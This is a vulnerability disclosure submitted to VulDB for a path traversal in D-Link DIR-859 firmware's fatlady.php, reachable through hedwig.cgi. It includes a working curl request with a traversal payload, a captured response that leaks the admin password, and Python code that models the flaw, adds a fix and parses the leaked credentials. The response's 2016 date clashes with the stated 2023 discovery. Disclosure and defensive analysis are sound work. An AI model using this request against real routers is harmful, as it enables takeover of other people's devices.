Submit #267965: D-LINK DIR-859 RevA_FW_Patch_v1.06B01 Improper Input Validation, Improper Privilege Management

Title: D-LINK DIR-859 RevA_FW_Patch_v1.06B01 Improper Input Validation, Improper Privilege Management
Description:

Thank you, VulDB team, for your incredible work. I want to inform you that after patiently waiting for 30 days in the hope of receiving a response from D-Link regarding the critical vulnerability identified in the DIR-859 router firmware, regrettably, no outcome has been achieved. Digital security is a shared responsibility, and acting promptly when potential threats are identified is crucial. In light of D-Link's lack of a satisfactory response, we believe it is in the community's interest to disclose information about the vulnerability to ensure that everyone is aware of the associated risks.

# D-Link DIR-859 Firmware RevA_FW_Patch_v1.06B01: Path Traversal in "fatlady.php"

A Path Traversal vulnerability was discovered in the "fatlady.php" file of D-Link DIR-859 firmware RevA_FW_Patch_v1.06B01. It allows configuration and session data to be read from the device, including the login and password of the admin panel, leading to full privilege escalation and unauthorized control of the device via the admin panel.

## 1. Vulnerability Information

**Authors**: Françoa Taffarel Rosário Corrêa, Osmany Barros de Freitas and Lourenço Alves Pereira Junior.

**Affiliation**: Aeronautics Institute of Technology (ita.br)

**Common Weakness Enumeration**:
CWE-22: Improper Limitation of a Pathname to a Restricted Directory
CWE-269: Improper Privilege Management

**Vulnerability Description**: In D-Link DIR-859 firmware RevA_FW_Patch_v1.06B01, a Path Traversal vulnerability in the "fatlady.php" file allows the leakage of configuration and session data, including the admin panel credentials, leading to full privilege escalation and potential unauthorized control of the device via the admin panel.

**The detail of vulnerability**: In the D-Link DIR-859 firmware version RevA_FW_Patch_v1.06B01, a critical Path Traversal vulnerability has been identified in the "fatlady.php" file. It allows an attacker to read files outside the intended configuration directory, exposing the administrator account name and password and thereby enabling privilege escalation and unauthorized control of the device via the admin panel.
The exploit method involves a malicious POST request, sent with curl to "hedwig.cgi", whose XML payload is handed to "fatlady.php". Within this request, the attacker manipulates the `service` parameter of the XML payload to traverse directories and read files that the endpoint was never meant to serve. The risk is exacerbated by the lack of proper validation and sanitization of the `service` value in "fatlady.php" before it is used to build a filesystem path. By supplying `../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml` as the service name, the attacker retrieves a configuration file that contains the login and password of the admin panel. The flaw is particularly severe because the request in the proof of concept carries only an arbitrary `uid=123` cookie, and because the disclosed file holds the administrator password in plaintext. Immediate action is strongly advised: update the router firmware, implement robust access controls, conduct thorough security audits, and monitor network activity to promptly address and mitigate potential risks.

**Vendor of the product**: D-LINK

**Affected product**: DIR-859

**Affected Version**: Firmware RevA_FW_Patch_v1.06B01

**Vulnerability Score V3.1**:

**Dates info**:
Vulnerability discovered: 15/12/2023
First try to contact vendor: 15/12/2023 via e-mail
Request CVE ID (VulDB): 15/01/2024
Date Record Created (MITRE):
First vendor response:
CVE Assignment Team response:
Second try to contact vendor:
CVE published in the CVE List:

## 2. Proof of Concept

**Exploit Title**: D-Link DIR-859 Firmware RevA_FW_Patch_v1.06B01 - Path Traversal in "fatlady.php" leaking admin panel credentials (Privilege Escalation)
**Google Dork**: NA

**Date**: 15/01/2024

**Exploit Author**: Françoa Taffarel

**Vendor Homepage**: https://www.dlink.com.br/produto/dir-859/#suporte

**Software Link**: https://www.dlink.com.br/wp-content/uploads/2018/11/DIR-859_RevA_FW_Patch_v1.06B01.zip

**Version**: Firmware RevA_FW_Patch_v1.06B01

**Tested on**: D-Link DIR-859

**CVE**: pending (requested via VulDB on 15/01/2024)

### Malicious POST Request via curl

```
curl -X POST "http://192.168.0.1:80/hedwig.cgi" \
  -H "Content-Type: text/xml" \
  -H "Cookie: uid=123" \
  -d "<?xml version=\"1.0\" encoding=\"utf-8\"?><postxml><module><service>../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml</service></module></postxml>"
```

### Response leaking the login and password of the router admin panel

```
*   Trying 192.168.0.1...
* TCP_NODELAY set
* Connected to 192.168.0.1 (192.168.0.1) port 80 (#0)
> POST /hedwig.cgi HTTP/1.1
> Host: 192.168.0.1
> User-Agent: curl/7.58.0
> Accept: */*
> Content-Type: text/xml
> Cookie: uid=123
> Content-Length: 145
>
* upload completely sent off: 145 out of 145 bytes
< HTTP/1.1 200 OK
< Server: WebServer
< Date: Wed, 23 Nov 2016 16:25:55 GMT
< Transfer-Encoding: chunked
< Content-Type: text/xml
<
<module>
  <service></service>
  <dhcps6>
    <seqno>3</seqno>
    <max>2</max>
    <entry>
      <uid>DHCPS6-1</uid>
      <mode>STATELESS</mode>
      <start>::3</start>
      <count>20</count>
      <pd>
        <enable>1</enable>
        <mode>1</mode>
      </pd>
    </entry>
    <entry>
      <uid>DHCPS6-2</uid>
      <mode>STATELESS</mode>
      <start>::3</start>
      <count>20</count>
      <pd>
        <enable>0</enable>
        <mode>1</mode>
      </pd>
    </entry>
    <entry>
      <uid>DHCPS6-3</uid>
      <mode>STATELESS</mode>
      <start>::3</start>
      <count>20</count>
      <pd>
        <enable>0</enable>
        <mode>1</mode>
      </pd>
    </entry>
  </dhcps6>
  <inf>
    <device>
      <layout>router</layout>
      <wirelessmode>WirelessRouter</wirelessmode>
      <hostname>dlinkrouter</hostname>
      <hostname_dhcpc>dlinkrouter</hostname_dhcpc>
      <devicename>DIR-859</devicename>
      <gw_name>DIR-859</gw_name>
      <router>
        <mode>1W2L</mode>
        <wanindex>4</wanindex>
      </router>
      <time>
        <ntp>
          <enable>1</enable>
          <period>604800</period>
          <server>ntp1.dlink.com</server>
        </ntp>
        <ntp6>
          <enable>1</enable>
          <period>604800</period>
        </ntp6>
        <timezone>61</timezone>
        <time></time>
        <date></date>
        <dst>0</dst>
        <dstmanual></dstmanual>
        <dstoffset></dstoffset>
      </time>
      <account>
        <count>1</count>
        <max>2</max>
        <entry>
          <name>Admin</name>
          <password>123456aa</password>
          <group>0</group>
        </entry>
      </account>
      <log>
        <level>NOTICE</level>
        <mydlink>
          <dnsquery>1</dnsquery>
        </mydlink>
      </log>
      <passthrough>
        <ipv6>0</ipv6>
        <pppoe>1</pppoe>
        <ipsec>1</ipsec>
        <pptp>1</pptp>
        <rtsp>1</rtsp>
        <sip>1</sip>
      </passthrough>
      <multicast>
        <igmpproxy>0</igmpproxy>
        <wifienhance>0</wifienhance>
        <mldproxy>0</mldproxy>
        <wifienhance6>0</wifienhance6>
      </multicast>
      <session>
        <captcha>0</captcha>
        <dummy></dummy>
        <timeout>300</timeout>
        <maxsession>128</maxsession>
        <maxauthorized>16</maxauthorized>
      </session>
```
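The following is an added example, not code from the advisory, from D-Link or from the firmware. It models the class of bug described above (a `service` value joined onto a directory without checks), places a hardened resolver beside it, and parses a leaked getcfg response to pull out the admin account, which is what an attacker or an incident responder reviewing a capture would do next. The directory `BASE_DIR`, the in-memory file store, the service-name allowlist and the trimmed stand-in for `DHCPS6.BRIDGE-1.xml` are all constructed assumptions; only the postxml body is taken verbatim from the PoC, and no device is contacted.

```python
"""Model of the hedwig.cgi -> fatlady.php traversal described in the advisory.

Added example: nothing here is the firmware's own code. BASE_DIR, FAKE_FS, the
allowlist regex and LEAKED_GETCFG are constructed for the demonstration.
"""
import posixpath
import re
import xml.etree.ElementTree as ET
from typing import Callable, Dict, Optional

# Assumed directory the handler resolves <service> against (constructed).
BASE_DIR = "/htdocs/webinc"

# Constructed, trimmed stand-in for the leaked DHCPS6.BRIDGE-1.xml, shaped
# like the response captured in the advisory (plaintext admin password).
LEAKED_GETCFG = """<module><service></service>
<inf><device><devicename>DIR-859</devicename>
<account><count>1</count><max>2</max>
<entry><name>Admin</name><password>123456aa</password><group>0</group></entry>
</account></device></inf></module>"""

# Fake filesystem (path -> contents). Only status.php is meant to be served.
FAKE_FS: Dict[str, str] = {
    "/htdocs/webinc/status.php": "<html>status page</html>",
    "/htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml": LEAKED_GETCFG,
}

# Verbatim postxml body from the advisory's curl PoC.
POC_BODY = (
    '<?xml version="1.0" encoding="utf-8"?><postxml><module><service>'
    "../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml"
    "</service></module></postxml>"
)

# Assumed allowlist: a bare service name, no path separators.
SERVICE_NAME = re.compile(r"[A-Za-z0-9_.-]+")


def service_from_postxml(body: str) -> str:
    """Extract module/service from a hedwig.cgi-style postxml document."""
    node = ET.fromstring(body).find("./module/service")
    return (node.text or "") if node is not None else ""


def vulnerable_resolve(service: str) -> str:
    """The bug: attacker input is joined onto BASE_DIR with no check.
    normpath collapses the ../ segments, so the result can leave BASE_DIR."""
    return posixpath.normpath(posixpath.join(BASE_DIR, service))


def hardened_resolve(service: str) -> Optional[str]:
    """Fix: syntactic allowlist first, then a containment check on the
    normalised path. Returns None when the request must be refused."""
    if not SERVICE_NAME.fullmatch(service) or service in (".", ".."):
        return None
    path = posixpath.normpath(posixpath.join(BASE_DIR, service))
    if path == BASE_DIR or posixpath.commonpath([BASE_DIR, path]) != BASE_DIR:
        return None
    return path


def handle_request(body: str, resolver: Callable[[str], Optional[str]]) -> Optional[str]:
    """Serve the file the resolver points at, or None if refused or missing."""
    path = resolver(service_from_postxml(body))
    return FAKE_FS.get(path) if path else None


def extract_admin_account(getcfg_xml: str) -> Optional[Dict[str, str]]:
    """What the attacker does with the response: locate the account entry."""
    entry = ET.fromstring(getcfg_xml).find(".//account/entry")
    if entry is None:
        return None
    return {"name": entry.findtext("name", ""),
            "password": entry.findtext("password", "")}


if __name__ == "__main__":
    leaked = handle_request(POC_BODY, vulnerable_resolve)
    print("vulnerable handler leaked:", extract_admin_account(leaked))
    print("hardened handler returned:", handle_request(POC_BODY, hardened_resolve))
```

The allowlist alone already stops the PoC, since any `/` in the service name is rejected; the containment check is kept as a second layer so that a future relaxation of the regex cannot silently reopen the traversal.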
Source: https://github.com/c2dc/cve-reported/blob/main/CVE-2024-XXXX/CVE-2024-XXXX.md
User: francoa.taffarel (ID 58833)
Submission: 01/15/2024 13:32 (4 months ago)
Moderation: 01/20/2024 16:13 (5 days later)
Status: Accepted
VulDB Entry: 251666
